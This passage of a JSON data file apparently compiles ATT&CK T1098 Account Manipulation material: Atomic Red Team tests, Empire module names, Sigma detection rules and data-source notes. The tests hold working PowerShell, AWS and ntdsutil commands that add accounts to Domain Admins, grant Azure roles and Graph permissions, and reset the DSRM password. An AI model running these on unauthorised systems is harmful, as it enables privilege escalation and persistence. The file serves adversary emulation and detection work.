"atomics/T1098/T1098.yaml", + "name": "Atomic Red Team Test - Account Manipulation" + }, + { + "command": "powershell/management/honeyhash", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/situational_awareness/network/powerview/set_ad_object", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1098", + "display_name": "Account Manipulation", + "atomic_tests": [ + { + "name": "Admin Account Manipulate", + "auto_generated_guid": "5598f7cb-cf43-455e-883a-f6008c5d46af", + "description": "Manipulate Admin Account Name\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "$x = Get-Random -Minimum 2 -Maximum 9999\n$y = Get-Random -Minimum 2 -Maximum 9999\n$z = Get-Random -Minimum 2 -Maximum 9999\n$w = Get-Random -Minimum 2 -Maximum 9999\nWrite-Host HaHa_$x$y$z\n\n$fmm = Get-LocalGroupMember -Group Administrators |?{ $_.ObjectClass -match \"User\" -and $_.PrincipalSource -match \"Local\"} | Select Name\n\nforeach($member in $fmm) {\n if($member -like \"*Administrator*\") {\n $account = $member.Name -replace \".+\\\\\\\",\"\" # strip computername\\\n $originalDescription = (Get-LocalUser -Name $account).Description\n Set-LocalUser -Name $account -Description \"atr:$account;$originalDescription\".Substring(0,48) # Keep original name in description\n Rename-LocalUser -Name $account -NewName \"HaHa_$x$y$z\" # Required due to length limitation\n Write-Host \"Successfully Renamed $account Account on \" $Env:COMPUTERNAME\n }\n }\n", + "cleanup_command": "$list = Get-LocalUser |?{$_.Description -like \"atr:*\"}\nforeach($u in $list) {\n $u.Description -match \"atr:(?[^;]+);(?.*)\"\n Set-LocalUser -Name $u.Name -Description $Matches.Description\n Rename-LocalUser -Name $u.Name -NewName $Matches.Name\n Write-Host \"Successfully Reverted Account $($u.Name) to $($Matches.Name) on \" $Env:COMPUTERNAME\n}\n", + "name": "powershell", + "elevation_required": true + } + }, + { + "name": "Domain Account and Group Manipulate", + "auto_generated_guid": "a55a22e9-a3d3-42ce-bd48-2653adb8f7a9", + "description": "Create a random atr-nnnnnnnn account and add it to a domain group (by default, Domain Admins). \n\nThe quickest way to run it is against a domain controller, using `-Session` of `Invoke-AtomicTest`. Alternatively,\nyou need to install PS Module ActiveDirectory (in prereqs) and run the script with appropriare AD privileges to \ncreate the user and alter the group. Automatic installation of the dependency requires an elevated session, \nand is unlikely to work with Powershell Core (untested).\n\nIf you consider running this test against a production Active Directory, the good practise is to create a dedicated\nservice account whose delegation is given onto a dedicated OU for user creation and deletion, as well as delegated\nas group manager of the target group.\n\nExample: `Invoke-AtomicTest -Session $session 'T1098' -TestNames \"Domain Account and Group Manipulate\" -InputArgs @{\"group\" = \"DNSAdmins\" }`\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "account_prefix": { + "description": "Prefix string of the random username (by default, atr-). Because the cleanup deletes such account based on\na match `(&(samaccountname=#{account_prefix}-*)(givenName=Test))`, if you are to change it, be careful.\n", + "type": "String", + "default": "atr-" + }, + "group": { + "description": "Name of the group to alter", + "type": "String", + "default": "Domain Admins" + }, + "create_args": { + "description": "Additional string appended to New-ADUser call", + "type": "String", + "default": "" + } + }, + "dependencies": [ + { + "description": "PS Module ActiveDirectory\n", + "prereq_command": "Try {\n Import-Module ActiveDirectory -ErrorAction Stop | Out-Null\n exit 0\n} \nCatch {\n exit 1\n}\n", + "get_prereq_command": "if((Get-CimInstance -ClassName Win32_OperatingSystem).ProductType -eq 1) {\n Add-WindowsCapability -Name (Get-WindowsCapability -Name RSAT.ActiveDirectory.DS* -Online).Name -Online\n} else {\n Install-WindowsFeature RSAT-AD-PowerShell\n}\n" + } + ], + "executor": { + "command": "$x = Get-Random -Minimum 2 -Maximum 99\n$y = Get-Random -Minimum 2 -Maximum 99\n$z = Get-Random -Minimum 2 -Maximum 99\n$w = Get-Random -Minimum 2 -Maximum 99\n\nImport-Module ActiveDirectory\n$account = \"#{account_prefix}-$x$y$z\"\nNew-ADUser -Name $account -GivenName \"Test\" -DisplayName $account -SamAccountName $account -Surname $account -Enabled:$False #{create_args}\nAdd-ADGroupMember \"#{group}\" $account\n", + "cleanup_command": "Get-ADUser -LDAPFilter \"(&(samaccountname=#{account_prefix}-*)(givenName=Test))\" | Remove-ADUser -Confirm:$False\n", + "name": "powershell" + } + }, + { + "name": "AWS - Create a group and add a user to that group", + "auto_generated_guid": "8822c3b0-d9f9-4daf-a043-49f110a31122", + "description": "Adversaries create AWS group, add users to specific to that group to elevate their privilieges to gain more accesss\n", + "supported_platforms": [ + "iaas:aws" + ], + "input_arguments": { + "username": { + "description": "Name of the AWS group to create", + "type": "String", + "default": "atomicredteam" + } + }, + "dependencies": [ + { + "description": "Check if the user exists, we can only add a user to a group if the user exists.\n", + "prereq_command": "aws iam list-users | grep #{username}\n", + "get_prereq_command": "echo Please run atomic test T1136.003, before running this atomic test\n" + } + ], + "executor": { + "command": "aws iam create-group --group-name #{username}\naws iam add-user-to-group --user-name #{username} --group-name #{username}\n", + "cleanup_command": "aws iam remove-user-from-group --user-name #{username} --group-name #{username}\naws iam delete-group --group-name #{username}\n", + "name": "sh" + } + }, + { + "name": "Azure - adding user to Azure AD role", + "auto_generated_guid": "0e65ae27-5385-46b4-98ac-607a8ee82261", + "description": "The adversarie want to add user to some Azure AD role. Threat actor \nmay be interested primarily in highly privileged roles, e.g. Global Administrator, Application Administrator, \nPrivileged authentication administrator (this role can reset Global Administrator password!).\nBy default, the role Global Reader is assigned to service principal in this test.\n\nThe account you use to run the PowerShell command should have Privileged Role Administrator or Global Administrator role in your Azure AD.\n\nDetection hint - check Activity \"Add member to role\" in Azure AD Audit Logs. In targer you will also see User as a type.\n", + "supported_platforms": [ + "azure-ad" + ], + "input_arguments": { + "username": { + "description": "Azure AD username", + "type": "String", + "default": "jonh@contoso.com" + }, + "password": { + "description": "Azure AD password", + "type": "String", + "default": "p4sswd" + }, + "user_principal_name": { + "description": "Name of the targeted user (user principal)", + "type": "String", + "default": "SuperUser" + }, + "role_name": { + "description": "Name of the targed Azure AD role", + "type": "String", + "default": "Global Reader" + } + }, + "dependencies": [ + { + "description": "AzureAD module must be installed.\n", + "prereq_command": "try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}\n", + "get_prereq_command": "Install-Module -Name AzureAD -Force\n" + } + ], + "executor": { + "command": "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzureAD -Credential $Credential\n\n$user = Get-AzureADUser | where-object {$_.DisplayName -eq \"#{user_principal_name}\"}\nif ($user -eq $null) { Write-Warning \"User not found\"; exit }\n$role = Get-AzureADDirectoryRole | where-object {$_.DisplayName -eq \"#{role_name}\"}\nif ($role -eq $null) { Write-Warning \"Role not found\"; exit }\nAdd-AzureADDirectoryRoleMember -ObjectId $role.ObjectId -RefObjectId $user.ObjectId\nWrite-Host \"User $($user.DisplayName) was added to $($role.DisplayName) role\"\n", + "cleanup_command": "Import-Module -Name AzureAD -ErrorAction Ignore\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzureAD -Credential $Credential -ErrorAction Ignore\n\n$user = Get-AzureADUser | where-object {$_.DisplayName -eq \"#{user_principal_name}\"}\nif ($user -eq $null) { Write-Warning \"User not found\"; exit }\n$role = Get-AzureADDirectoryRole | where-object {$_.DisplayName -eq \"#{role_name}\"}\nif ($role -eq $null) { Write-Warning \"Role not found\"; exit }\n\nRemove-AzureADDirectoryRoleMember -ObjectId $role.ObjectId -MemberId $user.ObjectId\nWrite-Host \"User $($user.DisplayName) was removed from $($role.DisplayName) role\"\n", + "name": "powershell", + "elevation_required": false + } + }, + { + "name": "Azure - adding service principal to Azure AD role", + "auto_generated_guid": "92c40b3f-c406-4d1f-8d2b-c039bf5009e4", + "description": "The adversarie want to add service principal to some Azure AD role. Threat actor \nmay be interested primarily in highly privileged roles, e.g. Global Administrator, Application Administrator, \nPrivileged authentication administrator (this role can reset Global Administrator password!).\nBy default, the role Global Reader is assigned to service principal in this test.\n\nThe account you use to run the PowerShell command should have Privileged Role Administrator or Global Administrator role in your Azure AD.\n\nDetection hint - check Activity \"Add member to role\" in Azure AD Audit Logs. In targer you will also see Service Principal as a type.\n", + "supported_platforms": [ + "azure-ad" + ], + "input_arguments": { + "username": { + "description": "Azure AD username", + "type": "String", + "default": "jonh@contoso.com" + }, + "password": { + "description": "Azure AD password", + "type": "String", + "default": "p4sswd" + }, + "service_principal_name": { + "description": "Name of the service principal", + "type": "String", + "default": "SuperSP" + }, + "role_name": { + "description": "Name of the targed Azure AD role", + "type": "String", + "default": "Global Reader" + } + }, + "dependencies": [ + { + "description": "AzureAD module must be installed.\n", + "prereq_command": "try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}\n", + "get_prereq_command": "Install-Module -Name AzureAD -Force\n" + } + ], + "executor": { + "command": "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzureAD -Credential $Credential\n\n$sp = Get-AzureADServicePrincipal | where-object {$_.DisplayName -eq \"#{service_principal_name}\"}\nif ($sp -eq $null) { Write-Warning \"Service Principal not found\"; exit }\n$role = Get-AzureADDirectoryRole | where-object {$_.DisplayName -eq \"#{role_name}\"}\nif ($role -eq $null) { Write-Warning \"Role not found\"; exit }\nAdd-AzureADDirectoryRoleMember -ObjectId $role.ObjectId -RefObjectId $sp.ObjectId\nWrite-Host \"Service Principal $($sp.DisplayName) was added to $($role.DisplayName)\"\n", + "cleanup_command": "Import-Module -Name AzureAD -ErrorAction Ignore\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzureAD -Credential $Credential -ErrorAction Ignore\n\n$sp = Get-AzureADServicePrincipal | where-object {$_.DisplayName -eq \"#{service_principal_name}\"}\nif ($sp -eq $null) { Write-Warning \"Service Principal not found\"; exit }\n$role = Get-AzureADDirectoryRole | where-object {$_.DisplayName -eq \"#{role_name}\"}\nif ($role -eq $null) { Write-Warning \"Role not found\"; exit }\n\nRemove-AzureADDirectoryRoleMember -ObjectId $role.ObjectId -MemberId $sp.ObjectId\nWrite-Host \"Service Principal $($sp.DisplayName) was removed from $($role.DisplayName) role\"\n", + "name": "powershell", + "elevation_required": false + } + }, + { + "name": "Azure - adding user to Azure role in subscription", + "auto_generated_guid": "1a94b3fc-b080-450a-b3d8-6d9b57b472ea", + "description": "The adversarie want to add user to some Azure role, also called Azure resource role. Threat actor \nmay be interested primarily in highly privileged roles, e.g. Owner, Contributor.\nBy default, the role Reader is assigned to user in this test.\n\nNew-AzRoleAssignment cmdlet could be also use to assign user/service principal to resource, resource group and management group.\n\nThe account you use to run the PowerShell command must have Microsoft.Authorization/roleAssignments/write \n(e.g. such as User Access Administrator or Owner) and the Azure Active Directory Graph Directory.Read.All \nand Microsoft Graph Directory.Read.All permissions.\n\nDetection hint - check Operation Name \"Create role assignment\" in subscriptions Activity Logs.\n", + "supported_platforms": [ + "iaas:azure" + ], + "input_arguments": { + "username": { + "description": "Azure AD username", + "type": "String", + "default": "jonh@contoso.com" + }, + "password": { + "description": "Azure AD password", + "type": "String", + "default": "p4sswd" + }, + "user_principal_name": { + "description": "Name of the targeted user (user principal)", + "type": "String", + "default": "SuperUser" + }, + "role_name": { + "description": "Name of the targed Azure role", + "type": "String", + "default": "Reader" + }, + "subscription": { + "description": "Name of the targed subscription", + "type": "String", + "default": "Azure subscription 1" + } + }, + "dependencies": [ + { + "description": "Az.Resources module must be installed.\n", + "prereq_command": "try {if (Get-InstalledModule -Name Az.Resources -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}\n", + "get_prereq_command": "Install-Module -Name Az.Resources -Force\n" + } + ], + "executor": { + "command": "Import-Module -Name Az.Resources\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzAccount -Credential $Credential\n\n$user = Get-AzADUser | where-object {$_.DisplayName -eq \"#{user_principal_name}\"}\nif ($user -eq $null) { Write-Warning \"User not found\"; exit }\n$subscription = Get-AzSubscription | where-object {$_.Name -eq \"#{subscription}\"}\nif ($subscription -eq $null) { Write-Warning \"Subscription not found\"; exit }\n$role = Get-AzRoleDefinition | where-object {$_.Name -eq \"#{role_name}\"}\nif ($role -eq $null) { Write-Warning \"Role not found\"; exit }\n\nNew-AzRoleAssignment -ObjectId $user.id -RoleDefinitionId $role.id -Scope /subscriptions/$subscription\nWrite-Host \"User $($user.DisplayName) was added to $($role.Name) role in subscriptions $($subscriptions.Name)\"\n", + "cleanup_command": "Import-Module -Name AzureAD -ErrorAction Ignore\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzAccount -Credential $Credential -ErrorAction Ignore\n\n$user = Get-AzADUser | where-object {$_.DisplayName -eq \"#{user_principal_name}\"}\nif ($user -eq $null) { Write-Warning \"User not found\"; exit }\n$subscription = Get-AzSubscription | where-object {$_.Name -eq \"#{subscription}\"}\nif ($subscription -eq $null) { Write-Warning \"Subscription not found\"; exit }\n$role = Get-AzRoleDefinition | where-object {$_.Name -eq \"#{role_name}\"}\nif ($role -eq $null) { Write-Warning \"Role not found\"; exit }\n\nRemove-AzRoleAssignment -ObjectId $user.id -RoleDefinitionId $role.id -Scope /subscriptions/$subscription\nWrite-Host \"Service Principal $($sp.DisplayName) was removed from $($role.Name) role in subscriptions $($subscriptions.Name)\"\n", + "name": "powershell", + "elevation_required": false + } + }, + { + "name": "Azure - adding service principal to Azure role in subscription", + "auto_generated_guid": "c8f4bc29-a151-48da-b3be-4680af56f404", + "description": "The adversarie want to add service principal to some Azure role, also called Azure resource role. Threat actor \nmay be interested primarily in highly privileged roles, e.g. Owner, Contributor.\nBy default, the role Reader is assigned to service principal in this test.\n\nNew-AzRoleAssignment cmdlet could be also use to assign user/service principal to resource, resource group and management group.\n\nThe account you use to run the PowerShell command must have Microsoft.Authorization/roleAssignments/write \n(e.g. such as User Access Administrator or Owner) and the Azure Active Directory Graph Directory.Read.All \nand Microsoft Graph Directory.Read.All permissions.\n\nDetection hint - check Operation Name \"Create role assignment\" in subscriptions Activity Logs.\n", + "supported_platforms": [ + "iaas:azure" + ], + "input_arguments": { + "username": { + "description": "Azure AD username", + "type": "String", + "default": "jonh@contoso.com" + }, + "password": { + "description": "Azure AD password", + "type": "String", + "default": "p4sswd" + }, + "service_principal_name": { + "description": "Name of the service principal", + "type": "String", + "default": "SuperSP" + }, + "role_name": { + "description": "Name of the targed Azure role", + "type": "String", + "default": "Reader" + }, + "subscription": { + "description": "Name of the targed subscription", + "type": "String", + "default": "Azure subscription 1" + } + }, + "dependencies": [ + { + "description": "Az.Resources module must be installed.\n", + "prereq_command": "try {if (Get-InstalledModule -Name Az.Resources -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}\n", + "get_prereq_command": "Install-Module -Name Az.Resources -Force\n" + } + ], + "executor": { + "command": "Import-Module -Name Az.Resources\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzAccount -Credential $Credential\n\n$sp = Get-AzADServicePrincipal | where-object {$_.DisplayName -eq \"#{service_principal_name}\"}\nif ($sp -eq $null) { Write-Warning \"Service Principal not found\"; exit }\n$subscription = Get-AzSubscription | where-object {$_.Name -eq \"#{subscription}\"} \nif ($subscription -eq $null) { Write-Warning \"Subscription not found\"; exit }\n$role = Get-AzRoleDefinition | where-object {$_.Name -eq \"#{role_name}\"}\nif ($role -eq $null) { Write-Warning \"Role not found\"; exit }\n\nNew-AzRoleAssignment -ObjectId $sp.id -RoleDefinitionId $role.id -Scope /subscriptions/$subscription\nWrite-Host \"Service Principal $($sp.DisplayName) was added to $($role.Name) role in subscriptions $($subscriptions.Name)\"\n", + "cleanup_command": "Import-Module -Name AzureAD -ErrorAction Ignore\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzAccount -Credential $Credential -ErrorAction Ignore\n\n$sp = Get-AzADServicePrincipal | where-object {$_.DisplayName -eq \"#{service_principal_name}\"}\nif ($sp -eq $null) { Write-Warning \"Service Principal not found\"; exit }\n$subscription = Get-AzSubscription | where-object {$_.Name -eq \"#{subscription}\"} \nif ($subscription -eq $null) { Write-Warning \"Subscription not found\"; exit }\n$role = Get-AzRoleDefinition | where-object {$_.Name -eq \"#{role_name}\"}\nif ($role -eq $null) { Write-Warning \"Role not found\"; exit }\n\nRemove-AzRoleAssignment -ObjectId $sp.id -RoleDefinitionId $role.id -Scope /subscriptions/$subscription\nWrite-Host \"Service Principal $($sp.DisplayName) was removed from $($role.Name) role in subscriptions $($subscriptions.Name)\"\n", + "name": "powershell", + "elevation_required": false + } + }, + { + "name": "AzureAD - adding permission to application", + "auto_generated_guid": "94ea9cc3-81f9-4111-8dde-3fb54f36af4b", + "description": "The adversarie want to add permission to new created application. Application could be then use for persistence or for further operation in the attacked infrastructure. Permissions like AppRoleAssignment.ReadWrite.All or RoleManagement.ReadWrite.Directory in particular can be a valuable target for a threat actor.\nYou can use Get-AzureADApplication instead New-AzureADServicePrincipal to use an existing application.\nThe DirectoryRecommendations.Read.All permissions have been selected as the default\n\nThe account you use to run the PowerShell command should have Global Administrator/Application Administrator/Cloud Application Administrator role in your Azure AD.\n\nDetection hint - check Operation Name \"Add app role assignment to service principal\" in subscriptions Activity Logs.\nYou can also take a look at the materials:\nhttps://learnsentinel.blog/2022/01/04/azuread-privesc-sentinel/\nhttps://github.com/reprise99/Sentinel-Queries\nhttps://docs.google.com/presentation/d/1AWx1w0Xcq8ENvOmSjAJswEgEio-il09QWZlGg9PbHqE/edit#slide=id.g10460eb209c_0_2766\nhttps://gist.github.com/andyrobbins/7c3dd62e6ed8678c97df9565ff3523fb\n", + "supported_platforms": [ + "azure-ad" + ], + "input_arguments": { + "username": { + "description": "Azure AD username", + "type": "String", + "default": "jonh@contoso.com" + }, + "password": { + "description": "Azure AD password", + "type": "String", + "default": "p4sswd" + }, + "application_name": { + "description": "Name of the targed application", + "type": "String", + "default": "test_app" + }, + "application_permission": { + "description": "Permission from Microsoft Graph Resource API that will be add to application", + "type": "String", + "default": "DirectoryRecommendations.Read.All" + } + }, + "dependencies": [ + { + "description": "AzureAD module must be installed.\n", + "prereq_command": "try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}\n", + "get_prereq_command": "Install-Module -Name AzureAD -Force\n" + } + ], + "executor": { + "command": "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzureAD -Credential $Credential\n\n$aadApplication = New-AzureADApplication -DisplayName \"#{application_name}\"\n$servicePrincipal = New-AzureADServicePrincipal -AppId $aadApplication.AppId\n#$aadApplication = Get-AzureADApplication | Where-Object {$_.DisplayName -eq \"#{application_name}\"}\n\n#Get Service Principal of Microsoft Graph Resource API \n$graphSP = Get-AzureADServicePrincipal -All $true | Where-Object {$_.DisplayName -eq \"Microsoft Graph\"}\n\n#Initialize RequiredResourceAccess for Microsoft Graph Resource API \n$requiredGraphAccess = New-Object Microsoft.Open.AzureAD.Model.RequiredResourceAccess\n$requiredGraphAccess.ResourceAppId = $graphSP.AppId\n$requiredGraphAccess.ResourceAccess = New-Object System.Collections.Generic.List[Microsoft.Open.AzureAD.Model.ResourceAccess]\n\n#Set Application Permissions\n$ApplicationPermissions = @('#{application_permission}')\n\n$reqPermission = $graphSP.AppRoles | Where-Object {$_.Value -eq $ApplicationPermissions}\nif($reqPermission)\n{\n$resourceAccess = New-Object Microsoft.Open.AzureAD.Model.ResourceAccess\n$resourceAccess.Type = \"Role\"\n$resourceAccess.Id = $reqPermission.Id \n#Add required app permission\n$requiredGraphAccess.ResourceAccess.Add($resourceAccess)\n}\nelse\n{\nWrite-Host \"App permission $permission not found in the Graph Resource API\" -ForegroundColor Red\n}\n\n#Add required resource accesses\n$requiredResourcesAccess = New-Object System.Collections.Generic.List[Microsoft.Open.AzureAD.Model.RequiredResourceAccess]\n$requiredResourcesAccess.Add($requiredGraphAccess)\n\n#Set permissions in existing Azure AD App\nSet-AzureADApplication -ObjectId $aadApplication.ObjectId -RequiredResourceAccess $requiredResourcesAccess\n\n$servicePrincipal = Get-AzureADServicePrincipal -All $true | Where-Object {$_.AppId -eq $aadApplication.AppId}\n\nNew-AzureADServiceAppRoleAssignment -ObjectId $servicePrincipal.ObjectId -PrincipalId $servicePrincipal.ObjectId -ResourceId $graphSP.ObjectId -Id $reqPermission.Id\n", + "cleanup_command": "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzureAD -Credential $Credential\n\n$aadApplication = Get-AzureADApplication | Where-Object {$_.DisplayName -eq \"#{application_name}\"}\nRemove-AzureADApplication -ObjectId $aadApplication.ObjectId\n", + "name": "powershell", + "elevation_required": false + } + }, + { + "name": "Password Change on Directory Service Restore Mode (DSRM) Account", + "auto_generated_guid": "d5b886d9-d1c7-4b6e-a7b0-460041bf2823", + "description": "Change the password on the Directory Service Restore Mode (DSRM) account using ntdsutil by syncing to existing account\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "sync_account": { + "description": "Account to sync password from", + "type": "String", + "default": "%username%" + } + }, + "executor": { + "name": "command_prompt", + "elevation_required": true, + "command": "ntdsutil \"set dsrm password\" \"sync from domain account #{sync_account}\" \"q\" \"q\"\n" + } + } + ] + }, + { + "Empire Module": "powershell/management/honeyhash", + "ATT&CK Technique #1": "T1098", + "ATT&CK Technique #2": "", + "Technique": "Account Manipulation", + "Concatenate for Python Dictionary": "\"powershell/management/honeyhash\": [\"T1098\"]," + }, + { + "Empire Module": "powershell/situational_awareness/network/powerview/set_ad_object", + "ATT&CK Technique #1": "T1098", + "ATT&CK Technique #2": "", + "Technique": "Account Manipulation", + "Concatenate for Python Dictionary": "\"powershell/situational_awareness/network/powerview/set_ad_object\": [\"T1098\"]," + } + ], + "queries": [], + "possible_detections": [ + { + "title": "Active Directory User Backdoors", + "id": "300bac00-e041-4ee2-9c36-e262656a6ecc", + "description": "Detects scenarios where one can control another users or computers account without having to use their credentials.", + "references": [ + "https://msdn.microsoft.com/en-us/library/cc220234.aspx", + "https://adsecurity.org/?p=3466", + "https://www.harmj0y.net/blog/redteaming/another-word-on-delegation/" + ], + "author": "@neu5ron", + "tags": [ + "attack.t1098", + "attack.credential_access", + "attack.persistence" + ], + "logsource": { + "product": "windows", + "service": "security", + "definition1": "Requirements: Audit Policy : Account Management > Audit User Account Management, Group Policy : Computer Configuration\\Windows Settings\\Security Settings\\Advanced Audit Policy Configuration\\Audit Policies\\Account Management\\Audit User Account Management", + "definition2": "Requirements: Audit Policy : DS Access > Audit Directory Service Changes, Group Policy : Computer Configuration\\Windows Settings\\Security Settings\\Advanced Audit Policy Configuration\\Audit Policies\\DS Access\\Audit Directory Service Changes" + }, + "detection": { + "selection1": { + "EventID": 4738 + }, + "filter1": { + "AllowedToDelegateTo": null + }, + "filter2": { + "AllowedToDelegateTo": "-" + }, + "selection2": { + "EventID": 5136, + "AttributeLDAPDisplayName": "msDS-AllowedToDelegateTo" + }, + "selection3": { + "EventID": 5136, + "ObjectClass": "user", + "AttributeLDAPDisplayName": "servicePrincipalName" + }, + "selection4": { + "EventID": 5136, + "AttributeLDAPDisplayName": "msDS-AllowedToActOnBehalfOfOtherIdentity" + }, + "condition": "(selection1 and not 1 of filter*) or selection2 or selection3 or selection4" + }, + "falsepositives": [ + "Unknown" + ], + "level": "high" + }, + { + "title": "Password Change on Directory Service Restore Mode (DSRM) Account", + "id": "53ad8e36-f573-46bf-97e4-15ba5bf4bb51", + "status": "stable", + "description": "The Directory Service Restore Mode (DSRM) account is a local administrator account on Domain Controllers. Attackers may change the password to gain persistence.", + "references": [ + "https://adsecurity.org/?p=1714" + ], + "author": "Thomas Patzke", + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1098" + ], + "logsource": { + "product": "windows", + "service": "security" + }, + "detection": { + "selection": { + "EventID": 4794 + }, + "condition": "selection" + }, + "falsepositives": [ + "Initial installation of a domain controller" + ], + "level": "high" + }, + [ + "4624", + "Authentication logs" + ], + [ + "Windows event logs" + ], + [ + "Packet capture" + ], + [ + "API monitoring" + ], + [ + "4624", + "Authentication logs" + ], + [ + "Windows event logs" + ], + [ + "Packet capture" + ], + [ + "API monitoring" + ], + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "group", + "definition": "Information about collections of accounts or permissions within an organization.", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "group modification", + "description": "A group was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "group" + }, + { + "data_source": "group", + "definition": "Information about collections of accounts or permissions within an organization.", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "group modification", + "description": "A group was modified.", + "source_data_element": "user", + "relationship": "added", + "target_data_element": "user" + }, + { + "data_source": "group", + "definition": "Information about collections of accounts or permissions within an organization.", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "group modification", + "description": "A group was modified.", + "source_data_element": "user", + "relationship": "removed", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account modification", + "description": "A user account was modified.", + "source_data_element": "user", + "relationship": "requested modification of", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + 